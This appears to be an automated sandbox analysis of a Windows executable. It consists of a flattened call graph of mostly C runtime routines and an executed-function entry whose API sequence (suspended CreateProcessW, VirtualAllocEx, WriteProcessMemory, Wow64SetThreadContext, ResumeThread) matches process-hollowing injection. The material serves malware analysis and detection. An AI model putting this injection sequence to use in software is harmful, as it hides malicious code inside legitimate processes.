21790 6e2f28 21783->21790 22108 6ea6ef AcquireSRWLockExclusive 21784->22108 21786 6e2f40 21786->21790 22113 6ea7a4 21786->22113 21790->21723 21792 6e3307 _strlen 21791->21792 21793 6e33ff 21792->21793 21794 6e3312 21792->21794 21795 6e2600 std::_Throw_Cpp_error 30 API calls 21793->21795 21796 6e3369 21794->21796 21797 6e3352 21794->21797 21801 6e331c codecvt 21794->21801 21805 6e33ad 21795->21805 21799 6ea663 std::ios_base::_Init 3 API calls 21796->21799 21798 6ea663 std::ios_base::_Init 3 API calls 21797->21798 21798->21801 21799->21801 21800 6f7ddf std::_Throw_Cpp_error 29 API calls 21802 6e3409 21800->21802 21803 6e3430 std::_Throw_Cpp_error 30 API calls 21801->21803 21804 6e1460 std::_Throw_Cpp_error 29 API calls 21802->21804 21803->21805 21806 6e341f 21804->21806 21805->21800 21807 6e33d3 std::ios_base::_Ios_base_dtor 21805->21807 21806->21723 21807->21723 21809 6eaa0a 21808->21809 21810 6eaa03 21808->21810 21811 6e449a 21809->21811 21846 6efac8 EnterCriticalSection 21809->21846 21841 6f810f 21810->21841 21811->21742 21811->21746 21815 6eaa2f 21814->21815 21816 6f811d 21814->21816 21820 6eaa42 21815->21820 21895 6efad6 LeaveCriticalSection 21815->21895 21896 6f80f8 LeaveCriticalSection 21816->21896 21819 6f8124 21819->21746 21820->21746 21822 6e4628 21821->21822 21823 6e453b 21821->21823 21822->21823 21824 6ea663 std::ios_base::_Init 3 API calls 21822->21824 21823->21751 21823->21752 21825 6e463b 21824->21825 21897 6e3e90 21825->21897 21834 6eab4e _Yarn 21833->21834 21835 6eab55 21834->21835 22022 6eb4b2 21834->22022 21835->21743 21839 6f060c CallUnexpected RaiseException 21838->21839 21840 6e3e82 21839->21840 21847 6fced4 21841->21847 21846->21811 21848 6fd05b std::_Lockit::_Lockit 5 API calls 21847->21848 21849 6fced9 21848->21849 21868 6fd075 21849->21868 21869 6fcfd6 std::_Lockit::_Lockit 5 API calls 21868->21869 21870 6fcede 21869->21870 21871 6fd08f 21870->21871 21872 6fcfd6 std::_Lockit::_Lockit 5 API calls 21871->21872 21873 6fcee3 21872->21873 21874 6fd0a9 21873->21874 21875 6fcfd6 std::_Lockit::_Lockit 5 API calls 21874->21875 21876 6fcee8 21875->21876 21877 6fd0c3 21876->21877 21878 6fcfd6 std::_Lockit::_Lockit 5 API calls 21877->21878 21879 6fceed 21878->21879 21880 6fd0dd 21879->21880 21881 6fcfd6 std::_Lockit::_Lockit 5 API calls 21880->21881 21882 6fcef2 21881->21882 21883 6fd0f7 21882->21883 21884 6fcfd6 std::_Lockit::_Lockit 5 API calls 21883->21884 21885 6fcef7 21884->21885 21886 6fd111 21885->21886 21887 6fcfd6 std::_Lockit::_Lockit 5 API calls 21886->21887 21888 6fcefc 21887->21888 21889 6fd12b 21888->21889 21890 6fcfd6 std::_Lockit::_Lockit 5 API calls 21889->21890 21895->21820 21896->21819 21898 6ea9f4 std::_Lockit::_Lockit 7 API calls 21897->21898 21899 6e3ecb 21898->21899 21900 6e3f3f 21899->21900 21901 6e3f18 21899->21901 21968 6eb4ef 21900->21968 21959 6eabc5 21901->21959 21920 6eecbf 21982 6f3114 21920->21982 21973 6f974f 21959->21973 21963 6eabea 21964 6eabf9 21963->21964 21965 6f974f std::_Locinfo::_Locinfo_dtor 64 API calls 21963->21965 21966 6eac2b _Yarn 14 API calls 21964->21966 21965->21964 21967 6e3f26 21966->21967 21967->21920 21969 6e7900 codecvt 29 API calls 21968->21969 21970 6eb500 21969->21970 21971 6f060c CallUnexpected RaiseException 21970->21971 21972 6eb50e 21971->21972 21974 6fced4 std::_Lockit::_Lockit 5 API calls 21973->21974 21975 6f975c 21974->21975 21976 6f9981 std::_Locinfo::_Locinfo_dtor 64 API calls 21975->21976 21977 6eabd2 21976->21977 21978 6eac2b 21977->21978 21979 6eac39 21978->21979 21981 6eac45 _Yarn codecvt 21978->21981 21980 6f92d7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 21979->21980 21979->21981 21980->21981 21981->21963 21983 6fc16a __Getctype 39 API calls 21982->21983 21984 6f311f 21983->21984 21985 6fc74e __Getctype 39 API calls 21984->21985 22023 6eb4c0 Concurrency::cancel_current_task 22022->22023 22024 6f060c CallUnexpected RaiseException 22023->22024 22025 6eb4ce 22024->22025 22033 6f8d91 22026->22033 22028 6edae8 22028->21764 22030 6f9340 _Fputc 22029->22030 22081 6f950e 22030->22081 22032 6f9355 _Fputc 22032->21764 22034 6f8da4 _Fputc 22033->22034 22037 6f8f33 22034->22037 22036 6f8db3 _Fputc 22036->22028 22038 6f8f3f ___scrt_is_nonwritable_in_current_image 22037->22038 22039 6f8f6b 22038->22039 22040 6f8f46 22038->22040 22048 6f3315 EnterCriticalSection 22039->22048 22041 6f7f78 _Fputc 29 API calls 22040->22041 22044 6f8f61 22041->22044 22043 6f8f7a 22049 6f8dc7 22043->22049 22044->22036 22048->22043 22050 6f8dfe 22049->22050 22051 6f8dec 22049->22051 22052 6ff704 _Ungetc 29 API calls 22050->22052 22053 6f8eff _Fputc 66 API calls 22051->22053 22054 6f8e05 22052->22054 22065 6f8df6 22053->22065 22055 6ff704 _Ungetc 29 API calls 22054->22055 22060 6f8e2d 22054->22060 22057 6f8e16 22055->22057 22056 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 22058 6f8efd 22056->22058 22057->22060 22063 6ff704 _Ungetc 29 API calls 22057->22063 22078 6f8fbb 22058->22078 22059 6f8ee3 22062 6f8eff _Fputc 66 API calls 22059->22062 22060->22059 22061 6ff704 _Ungetc 29 API calls 22060->22061 22064 6f8e60 22061->22064 22062->22065 22066 6f8e22 22063->22066 22067 6f8e83 22064->22067 22069 6ff704 _Ungetc 29 API calls 22064->22069 22065->22056 22068 6ff704 _Ungetc 29 API calls 22066->22068 22067->22059 22070 6f8e9b 22067->22070 22068->22060 22071 6f8e6c 22069->22071 22072 6ff430 _Fputc 41 API calls 22070->22072 22071->22067 22074 6ff704 _Ungetc 29 API calls 22071->22074 22079 6f3329 _Ungetc LeaveCriticalSection 22078->22079 22080 6f8fc1 22079->22080 22080->22044 22082 6f951c 22081->22082 22083 6f9544 22081->22083 22082->22083 22084 6f954b 22082->22084 22085 6f9529 22082->22085 22083->22032 22089 6f95d1 22084->22089 22086 6f7f78 _Fputc 29 API calls 22085->22086 22086->22083 22090 6f95dd ___scrt_is_nonwritable_in_current_image 22089->22090 22097 6f3315 EnterCriticalSection 22090->22097 22092 6f95eb 22098 6f9585 22092->22098 22097->22092 22099 6fe68b 30 API calls 22098->22099 22100 6f959d 22099->22100 22101 6f9367 66 API calls 22100->22101 22102 6f95bb 22101->22102 22103 6fe774 64 API calls 22102->22103 22104 6f95c7 22103->22104 22105 6f9620 22104->22105 22106 6f3329 _Ungetc LeaveCriticalSection 22105->22106 22110 6ea703 22108->22110 22111 6ea708 ReleaseSRWLockExclusive 22110->22111 22117 6ea78f SleepConditionVariableSRW 22110->22117 22111->21786 22118 6ea7b9 22113->22118 22116 6ea73e AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 22116->21790 22117->22110 22119 6ea7cf 22118->22119 22120 6ea7c8 22118->22120 22127 6f73cb 22119->22127 22124 6f743c 22120->22124 22123 6e2f58 22123->22116 22125 6f73cb std::ios_base::_Init 32 API calls 22124->22125 22126 6f744e 22125->22126 22126->22123 22130 6f762e 22127->22130 22131 6f763a ___scrt_is_nonwritable_in_current_image 22130->22131 22132 6f80e1 std::_Lockit::_Lockit EnterCriticalSection 22131->22132 22133 6f7648 22132->22133 22134 6f7452 std::ios_base::_Init 32 API calls 22133->22134 22135 6f7655 22134->22135 22136 6f767d std::ios_base::_Init LeaveCriticalSection 22135->22136 22137 6f73fc 22136->22137 22137->22123 22139 6e4b4f 22138->22139 22140 6e2c50 39 API calls 22139->22140 22142 6e4b6f 22139->22142 22140->22142 22141 6e2f00 std::ios_base::_Init 38 API calls 22141->22142 22142->22141 22143 6e4c3e 22142->22143 22145 6e32c0 std::ios_base::_Init 30 API calls 22142->22145 22147 6f060c CallUnexpected RaiseException 22142->22147 22144 6e1de4 22143->22144 22146 6e38e0 39 API calls 22143->22146 22144->21732 22145->22142 22146->22144 22147->22142 22149 6e27ae 22148->22149 22150 6e27fa 22149->22150 22151 6e2c50 39 API calls 22149->22151 22158 6e27d1 22149->22158 22150->22158 22168 6ecfb0 22150->22168 22151->22150 22152 6e2f00 std::ios_base::_Init 38 API calls 22152->22158 22153 6e29de 22155 6e38e0 39 API calls 22153->22155 22156 6e1028 22153->22156 22154 6e32c0 std::ios_base::_Init 30 API calls 22154->22158 22155->22156 22160 6e1110 22156->22160 22157 6f060c CallUnexpected RaiseException 22157->22158 22158->22152 22158->22153 22158->22154 22158->22157 22161 6e115c 22160->22161 22172 6e3c70 22161->22172 22166 6e2c50 39 API calls 22167 6e1031 22166->22167 22167->21609 22169 6ecfbf 22168->22169 22171 6ecfd2 codecvt 22168->22171 22169->22158 22170 6f932d 69 API calls 22170->22169 22171->22169 22171->22170 22173 6ea9f4 std::_Lockit::_Lockit 7 API calls 22172->22173 22174 6e3caa 22173->22174 22175 6ea9f4 std::_Lockit::_Lockit 7 API calls 22174->22175 22177 6e3ce5 22174->22177 22176 6e3cc4 22175->22176 22181 6eaa25 std::_Lockit::~_Lockit 2 API calls 22176->22181 22179 6ea663 std::ios_base::_Init 3 API calls 22177->22179 22190 6e3daf 22177->22190 22178 6eaa25 std::_Lockit::~_Lockit 2 API calls 22180 6e1170 22178->22180 22182 6e3d4a 22179->22182 22191 6e3a00 22180->22191 22181->22177 22183 6e3e90 codecvt 67 API calls 22182->22183 22184 6e3d7c 22183->22184 22185 6eecbf __Getctype 39 API calls 22184->22185 22186 6e3d97 22185->22186 22187 6e4010 codecvt 65 API calls 22186->22187 22188 6e3da2 22187->22188 22189 6eab43 RaiseException 22188->22189 22189->22190 22190->22178 22192 6e3a3f 22191->22192 22194 6e2c50 39 API calls 22192->22194 22195 6e3a5f 22192->22195 22196 6e3a85 22192->22196 22193 6e2f00 std::ios_base::_Init 38 API calls 22193->22195 22194->22196 22195->22193 22197 6e32c0 std::ios_base::_Init 30 API calls 22195->22197 22198 6e3b2d 22195->22198 22201 6f060c CallUnexpected RaiseException 22195->22201 22196->22195 22205 6ecb22 22196->22205 22216 6ecb40 22196->22216 22225 6ecb32 22196->22225 22197->22195 22199 6e11e4 22198->22199 22200 6e38e0 39 API calls 22198->22200 22199->22166 22200->22199 22201->22195 22206 6ecb29 22205->22206 22211 6ecb2e 22205->22211 22241 6f3315 EnterCriticalSection 22206->22241 22208 6ecb79 22209 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 22208->22209 22210 6ecc48 22209->22210 22210->22195 22211->22195 22211->22208 22213 6ecc09 22211->22213 22214 6ecba9 22211->22214 22213->22208 22215 6f932d 69 API calls 22213->22215 22214->22208 22238 6ec44d 22214->22238 22215->22208 22219 6ecb5c 22216->22219 22220 6ecb63 22216->22220 22217 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 22218 6ecc48 22217->22218 22218->22195 22219->22217 22220->22219 22222 6ecc09 22220->22222 22223 6ecba9 22220->22223 22221 6ec44d _Fputc 68 API calls 22221->22219 22222->22219 22224 6f932d 69 API calls 22222->22224 22223->22219 22223->22221 22224->22219 22226 6ecb39 22225->22226 22230 6ecb85 22225->22230 22271 6f3329 LeaveCriticalSection 22226->22271 22228 6ecb10 22228->22195 22229 6ecb3e 22229->22195 22230->22195 22230->22228 22231 6ecc09 22230->22231 22232 6ecbea 22230->22232 22233 6f932d 69 API calls 22231->22233 22237 6ecbfb 22231->22237 22235 6ec44d _Fputc 68 API calls 22232->22235 22232->22237 22233->22237 22234 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 22236 6ecc48 22234->22236 22235->22237 22236->22195 22237->22234 22242 6f8bfc 22238->22242 22240 6ec45d 22240->22208 22241->22211 22243 6f8c0f _Fputc 22242->22243 22246 6f8c5d 22243->22246 22245 6f8c1e _Fputc 22245->22240 22247 6f8c69 ___scrt_is_nonwritable_in_current_image 22246->22247 22248 6f8c96 22247->22248 22249 6f8c72 22247->22249 22262 6f3315 EnterCriticalSection 22248->22262 22250 6f7f78 _Fputc 29 API calls 22249->22250 22261 6f8c8b _Fputc 22250->22261 22252 6f8c9f 22253 6f8cb4 22252->22253 22254 6ff704 _Ungetc 29 API calls 22252->22254 22255 6f8d51 22253->22255 22256 6f8d20 22253->22256 22254->22253 22263 6f8c30 22255->22263 22257 6f7f78 _Fputc 29 API calls 22256->22257 22257->22261 22259 6f8d5d 22268 6f8d89 22259->22268 22261->22245 22262->22252 22264 6f8c4f 22263->22264 22265 6f8c3e 22263->22265 22264->22259 22266 704a37 _Fputc 66 API calls 22265->22266 22267 6f8c4a 22266->22267 22267->22259 22269 6f3329 _Ungetc LeaveCriticalSection 22268->22269 22270 6f8d8f 22269->22270 22270->22261 22271->22229 22272 6e15d0 22283 6e1e40 22272->22283 22274 6e1702 std::ios_base::_Ios_base_dtor 22275 6e15db 22276 6e4320 30 API calls 22275->22276 22277 6e16dd 22275->22277 22279 6e1750 103 API calls 22275->22279 22282 6e1d10 75 API calls 22275->22282 22276->22275 22277->22274 22278 6f7ddf std::_Throw_Cpp_error 29 API calls 22277->22278 22280 6e1725 22278->22280 22279->22275 22281 6e1ea0 29 API calls 22280->22281 22282->22275 22284 6e1e63 _Fputc 22283->22284 22289 6f3558 22284->22289 22286 6e1e7c 22287 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 22286->22287 22288 6e1e8c 22287->22288 22288->22275 22291 6f356c _Fputc 22289->22291 22290 6f358e 22292 6f7f78 _Fputc 29 API calls 22290->22292 22291->22290 22293 6f35b5 22291->22293 22295 6f35a9 _Fputc 22292->22295 22296 6f4d0d 22293->22296 22295->22286 22297 6f4d19 ___scrt_is_nonwritable_in_current_image 22296->22297 22304 6f3315 EnterCriticalSection 22297->22304 22299 6f4d27 22305 6f46e2 22299->22305 22304->22299 22319 6fe68b 22305->22319 22307 6f4709 22326 6f3b31 22307->22326 22314 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 22315 6f477c 22314->22315 22316 6f4d5c 22315->22316 22699 6f3329 LeaveCriticalSection 22316->22699 22318 6f4d45 22318->22295 22349 6fe736 22319->22349 22321 6fe69c _Fputc 22322 6fe6fe 22321->22322 22323 6fbf11 __fread_nolock 15 API calls 22321->22323 22322->22307 22324 6fe6f5 22323->22324 22325 6fbed7 ___free_lconv_mon 14 API calls 22324->22325 22325->22322 22365 6f3a93 22326->22365 22329 6f3b57 22330 6f7f78 _Fputc 29 API calls 22329->22330 22331 6f3b74 22330->22331 22342 6f3861 22331->22342 22334 6f3790 _Fputc 39 API calls 22337 6f3b7f std::_Locinfo::_Locinfo_dtor 22334->22337 22336 6f39f2 66 API calls 22336->22337 22337->22331 22337->22334 22337->22336 22338 6f3d73 22337->22338 22371 6f3de1 22337->22371 22374 6f3e59 22337->22374 22414 6f3fb2 22337->22414 22339 6f7f78 _Fputc 29 API calls 22338->22339 22340 6f3d8d 22339->22340 22341 6f7f78 _Fputc 29 API calls 22340->22341 22341->22331 22343 6fbed7 ___free_lconv_mon 14 API calls 22342->22343 22344 6f3871 22343->22344 22345 6fe774 22344->22345 22346 6fe77f 22345->22346 22348 6f476a 22345->22348 22347 6f85b8 ___scrt_uninitialize_crt 64 API calls 22346->22347 22346->22348 22347->22348 22348->22314 22350 6fe742 _Fputc 22349->22350 22351 6fe76c 22350->22351 22352 6ff704 _Ungetc 29 API calls 22350->22352 22351->22321 22353 6fe75d 22352->22353 22356 70744f 22353->22356 22355 6fe763 22355->22321 22357 707469 22356->22357 22358 70745c 22356->22358 22360 6f76e4 __strnicoll 14 API calls 22357->22360 22362 707475 22357->22362 22359 6f76e4 __strnicoll 14 API calls 22358->22359 22361 707461 22359->22361 22363 707496 22360->22363 22361->22355 22362->22355 22364 6f7dcf __strnicoll 29 API calls 22363->22364 22364->22361 22366 6f3a9e 22365->22366 22367 6f3ac0 22365->22367 22368 6f7f78 _Fputc 29 API calls 22366->22368 22449 6f35fc 22367->22449 22370 6f3ab9 22368->22370 22370->22329 22370->22331 22370->22337 22457 6f4dda 22371->22457 22373 6f3e1c 22373->22337 22375 6f3e77 22374->22375 22376 6f3e60 22374->22376 22377 6f7f78 _Fputc 29 API calls 22375->22377 22385 6f3eb6 22375->22385 22378 6f3fd6 22376->22378 22379 6f4042 22376->22379 22376->22385 22382 6f3eab 22377->22382 22383 6f3fdc 22378->22383 22384 6f406a 22378->22384 22380 6f4047 22379->22380 22381 6f4081 22379->22381 22386 6f4049 22380->22386 22387 6f4078 22380->22387 22388 6f4086 22381->22388 22389 6f40a0 22381->22389 22382->22337 22395 6f3fe1 22383->22395 22396 6f4037 22383->22396 22505 6f4b80 22384->22505 22385->22337 22391 6f3ff0 22386->22391 22399 6f4058 22386->22399 22512 6f45ef 22387->22512 22388->22384 22388->22396 22406 6f4009 22388->22406 22516 6f460c 22389->22516 22397 6f40ab 22391->22397 22480 6f445e 22391->22480 22395->22391 22400 6f401c 22395->22400 22395->22406 22396->22397 22494 6f4866 22396->22494 22403 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 22397->22403 22399->22384 22401 6f405c 22399->22401 22400->22397 22490 6f42f4 22400->22490 22401->22397 22501 6f4622 22401->22501 22404 6f42f2 22403->22404 22404->22337 22406->22397 22409 6f41ac 22406->22409 22519 6f3acb 22406->22519 22408 6f3acb 66 API calls 22408->22409 22409->22408 22412 6f421f 22409->22412 22411 6f4284 22411->22397 22413 6f3acb 66 API calls 22411->22413 22412->22411 22523 6ff430 22412->22523 22413->22411 22415 6f3fd6 22414->22415 22416 6f4042 22414->22416 22419 6f3fdc 22415->22419 22420 6f406a 22415->22420 22417 6f4047 22416->22417 22418 6f4081 22416->22418 22421 6f4049 22417->22421 22422 6f4078 22417->22422 22423 6f4086 22418->22423 22424 6f40a0 22418->22424 22430 6f3fe1 22419->22430 22431 6f4037 22419->22431 22426 6f4b80 30 API calls 22420->22426 22428 6f3ff0 22421->22428 22435 6f4058 22421->22435 22427 6f45ef 30 API calls 22422->22427 22423->22420 22423->22431 22442 6f4009 22423->22442 22425 6f460c 30 API calls 22424->22425 22425->22442 22426->22442 22427->22442 22429 6f445e 42 API calls 22428->22429 22433 6f40ab 22428->22433 22429->22442 22430->22428 22432 6f401c 22430->22432 22430->22442 22431->22433 22434 6f4866 30 API calls 22431->22434 22432->22433 22437 6f42f4 41 API calls 22432->22437 22438 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 22433->22438 22434->22442 22435->22420 22436 6f405c 22435->22436 22436->22433 22440 6f4622 29 API calls 22436->22440 22437->22442 22439 6f42f2 22438->22439 22439->22337 22440->22442 22441 6f41ac 22444 6f3acb 66 API calls 22441->22444 22446 6f421f 22441->22446 22442->22433 22442->22441 22443 6f3acb 66 API calls 22442->22443 22443->22442 22444->22441 22445 6ff430 _Fputc 41 API calls 22445->22446 22446->22445 22447 6f4284 22446->22447 22447->22433 22448 6f3acb 66 API calls 22447->22448 22448->22447 22450 6f3610 22449->22450 22456 6f367a 22449->22456 22451 6ff704 _Ungetc 29 API calls 22450->22451 22452 6f3617 22451->22452 22453 6f76e4 __strnicoll 14 API calls 22452->22453 22452->22456 22454 6f366f 22453->22454 22455 6f7dcf __strnicoll 29 API calls 22454->22455 22455->22456 22456->22370 22467 6f4d68 22457->22467 22459 6f4dec 22460 6f4e01 22459->22460 22463 6f4e34 22459->22463 22466 6f4e1c std::_Locinfo::_Locinfo_dtor 22459->22466 22461 6f7f78 _Fputc 29 API calls 22460->22461 22461->22466 22462 6f4ecb 22464 6f4db1 29 API calls 22462->22464 22463->22462 22474 6f4db1 22463->22474 22464->22466 22466->22373 22468 6f4d6d 22467->22468 22469 6f4d80 22467->22469 22470 6f76e4 __strnicoll 14 API calls 22468->22470 22469->22459 22471 6f4d72 22470->22471 22472 6f7dcf __strnicoll 29 API calls 22471->22472 22473 6f4d7d 22472->22473 22473->22459 22475 6f4dd6 22474->22475 22476 6f4dc2 22474->22476 22475->22462 22476->22475 22477 6f76e4 __strnicoll 14 API calls 22476->22477 22478 6f4dcb 22477->22478 22479 6f7dcf __strnicoll 29 API calls 22478->22479 22479->22475 22481 6f4478 22480->22481 22533 6f477e 22481->22533 22483 6f44b7 22544 6fe8ff 22483->22544 22486 6f456e 22488 6f3790 _Fputc 39 API calls 22486->22488 22489 6f45a1 22486->22489 22487 6f3790 _Fputc 39 API calls 22487->22486 22488->22489 22489->22406 22489->22489 22491 6f430f 22490->22491 22492 6f4345 22491->22492 22493 6ff430 _Fputc 41 API calls 22491->22493 22492->22406 22493->22492 22495 6f487b 22494->22495 22496 6f48c4 22495->22496 22497 6f489d 22495->22497 22499 6f477e 15 API calls 22496->22499 22500 6f48ba 22496->22500 22498 6f7f78 _Fputc 29 API calls 22497->22498 22498->22500 22499->22500 22500->22406 22502 6f4638 22501->22502 22503 6f7f78 _Fputc 29 API calls 22502->22503 22504 6f4659 22502->22504 22503->22504 22504->22406 22506 6f4b95 22505->22506 22507 6f4bb7 22506->22507 22509 6f4bde 22506->22509 22508 6f7f78 _Fputc 29 API calls 22507->22508 22511 6f4bd4 22508->22511 22510 6f477e 15 API calls 22509->22510 22509->22511 22510->22511 22511->22406 22513 6f45fb 22512->22513 22692 6f49f3 22513->22692 22515 6f460b 22515->22406 22517 6f4866 30 API calls 22516->22517 22518 6f4621 22517->22518 22518->22406 22520 6f3add 22519->22520 22521 6f3ae5 22520->22521 22522 6f8c30 _Fputc 66 API calls 22520->22522 22521->22406 22522->22521 22524 6ff445 22523->22524 22525 6ff486 22524->22525 22526 6f3790 _Fputc 39 API calls 22524->22526 22531 6ff449 __fread_nolock _Fputc 22524->22531 22532 6ff472 __fread_nolock 22524->22532 22528 6fc021 _Fputc WideCharToMultiByte 22525->22528 22525->22531 22525->22532 22526->22525 22527 6f7f78 _Fputc 29 API calls 22527->22531 22529 6ff541 22528->22529 22530 6ff557 GetLastError 22529->22530 22529->22531 22530->22531 22530->22532 22531->22412 22532->22527 22532->22531 22534 6f47a5 22533->22534 22535 6f4793 22533->22535 22534->22535 22536 6fbf11 __fread_nolock 15 API calls 22534->22536 22535->22483 22537 6f47c9 22536->22537 22538 6f47dc 22537->22538 22539 6f47d1 22537->22539 22563 6f383d 22538->22563 22540 6fbed7 ___free_lconv_mon 14 API calls 22539->22540 22540->22535 22543 6fbed7 ___free_lconv_mon 14 API calls 22543->22535 22545 6fe934 22544->22545 22546 6fe910 22544->22546 22545->22546 22548 6fe967 22545->22548 22547 6f7f78 _Fputc 29 API calls 22546->22547 22560 6f454a 22547->22560 22549 6fe9cf 22548->22549 22550 6fe9a0 22548->22550 22551 6fe9f8 22549->22551 22552 6fe9fd 22549->22552 22566 6feab4 22550->22566 22554 6fea5f 22551->22554 22555 6fea25 22551->22555 22574 6fee76 22552->22574 22601 6fec9c 22554->22601 22557 6fea2a 22555->22557 22558 6fea45 22555->22558 22584 6ff327 22557->22584 22594 6ff291 22558->22594 22560->22486 22560->22487 22564 6fbed7 ___free_lconv_mon 14 API calls 22563->22564 22565 6f384c 22564->22565 22565->22543 22567 6feaca 22566->22567 22568 6fead5 22566->22568 22567->22560 22569 6fbb4c ___std_exception_copy 29 API calls 22568->22569 22570 6feb30 22569->22570 22571 6feb3a 22570->22571 22572 6f7dfc __Getctype 11 API calls 22570->22572 22571->22560 22573 6feb48 22572->22573 22575 6fee89 22574->22575 22576 6feeba 22575->22576 22577 6fee98 22575->22577 22578 6feecf 22576->22578 22581 6fef22 22576->22581 22579 6f7f78 _Fputc 29 API calls 22577->22579 22580 6fec9c 41 API calls 22578->22580 22583 6feeb0 __fread_nolock __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z _strrchr __allrem 22579->22583 22580->22583 22582 6f3790 _Fputc 39 API calls 22581->22582 22581->22583 22582->22583 22583->22560 22608 707792 22584->22608 22588 6ff395 22589 6ff39c 22588->22589 22590 6ff3d5 22588->22590 22591 6ff3ae 22588->22591 22589->22560 22595 707792 31 API calls 22594->22595 22596 6ff2c0 22595->22596 22597 7075e7 29 API calls 22596->22597 22598 6ff301 22597->22598 22599 6ff308 22598->22599 22600 6ff1a3 39 API calls 22598->22600 22599->22560 22600->22599 22602 707792 31 API calls 22601->22602 22603 6fecc6 22602->22603 22604 7075e7 29 API calls 22603->22604 22605 6fed14 22604->22605 22606 6feb49 41 API calls 22605->22606 22607 6fed1b 22605->22607 22606->22607 22607->22560 22609 7077c6 22608->22609 22610 6f7343 29 API calls 22609->22610 22612 70782f 22610->22612 22611 70785b 22614 6fbb4c ___std_exception_copy 29 API calls 22611->22614 22612->22611 22613 7078ed 22612->22613 22617 7078c8 22612->22617 22618 707888 22612->22618 22616 6f7343 29 API calls 22613->22616 22615 7078b8 22614->22615 22619 708d6d 22615->22619 22626 7078c3 22615->22626 22621 707917 22616->22621 22620 6fbb4c ___std_exception_copy 29 API calls 22617->22620 22618->22611 22618->22613 22622 6f7dfc __Getctype 11 API calls 22619->22622 22620->22615 22623 6f7343 29 API calls 22621->22623 22624 708d79 22622->22624 22625 70792a 22623->22625 22629 70a4c0 21 API calls 22625->22629 22627 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 22626->22627 22628 6ff357 22627->22628 22664 7075e7 22628->22664 22630 7079a4 22629->22630 22631 70a660 __floor_pentium4 21 API calls 22630->22631 22632 7079ae 22631->22632 22633 707c0c 22632->22633 22637 707a4c 22632->22637 22642 707ca9 22632->22642 22636 6f8fc3 __fread_nolock 29 API calls 22633->22636 22633->22642 22634 707ec3 22636->22642 22641 6f8fc3 __fread_nolock 29 API calls 22637->22641 22646 707ae9 22637->22646 22638 707dee 22641->22646 22642->22634 22642->22638 22645 6f8fc3 __fread_nolock 29 API calls 22646->22645 22665 7075f8 22664->22665 22667 70761a 22664->22667 22666 6f7f78 _Fputc 29 API calls 22665->22666 22669 707610 codecvt 22666->22669 22668 6f7f78 _Fputc 29 API calls 22667->22668 22667->22669 22668->22669 22669->22588 22693 6f4a08 22692->22693 22694 6f4a2a 22693->22694 22696 6f4a51 22693->22696 22695 6f7f78 _Fputc 29 API calls 22694->22695 22698 6f4a47 22695->22698 22697 6f477e 15 API calls 22696->22697 22696->22698 22697->22698 22698->22515 22699->22318 22700 71a19e 22707 71a1d4 22700->22707 22701 71a321 GetPEB 22702 71a333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 22701->22702 22703 71a3da WriteProcessMemory 22702->22703 22702->22707 22704 71a41f 22703->22704 22705 71a461 WriteProcessMemory Wow64SetThreadContext ResumeThread 22704->22705 22706 71a424 WriteProcessMemory 22704->22706 22706->22704 22707->22701 22707->22702

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 0071A19E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0071A110,0071A100), ref: 0071A334
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0071A347
                                                                                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 0071A365
                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(00000094,?,0071A154,00000004,00000000), ref: 0071A389
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(00000094,?,?,00003000,00000040), ref: 0071A3B4
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000094,00000000,?,?,00000000,?), ref: 0071A40C
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000094,00400000,?,?,00000000,?,00000028), ref: 0071A457
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000094,?,?,00000004,00000000), ref: 0071A495
                                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(00000098,006C0000), ref: 0071A4D1
                                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(00000098), ref: 0071A4E0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
